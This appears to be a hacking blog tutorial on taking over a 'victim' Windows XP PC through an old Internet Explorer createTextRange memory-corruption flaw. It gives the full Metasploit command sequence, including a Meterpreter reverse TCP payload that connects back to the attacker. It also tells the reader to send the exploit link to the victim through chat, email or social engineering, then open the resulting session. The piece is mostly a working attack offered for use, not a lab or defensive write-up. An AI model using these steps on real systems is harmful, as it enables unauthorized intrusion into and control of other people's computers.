How to Get Access of Remote Victim PC using Internet Explorer create Text Range () Code Execution

This module exploits code execution vulnerability in Microsoft Internet Explorer. Both IE6 and IE7 (Beta 2) are vulnerable. It will corrupt memory in a way, which, under certain circumstances, can lead to an invalid/corrupt table pointer dereference. EIP will point to a very remote, non-existent memory location. This module is the result of merging three different exploit submissions and has only been reliably tested against Windows XP SP2. This vulnerability was independently discovered by multiple parties. The heap spray method used by this exploit was pioneered by Skylined.

Exploit Targets

Internet Explorer 6, 7

Windows XP SP2

Windows XP SP3


Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Now type use exploit/windows/browser/ms06_013_createtextrange

Msf exploit (ms06_013_createtextrange)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ms06_013_createtextrange)>set lhost (IP of Local Host)

Msf exploit (ms06_013_createtextrange)>set srvhost (This must be an address on the local machine)

Msf exploit (ms06_013_createtextrange)>set uripath newupdates (The Url to use for this exploit)

Msf exploit (ms06_013_createtextrange)>exploit

Now an URL you should give to your victim

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 

Leave a Reply

Your email address will not be published. Required fields are marked *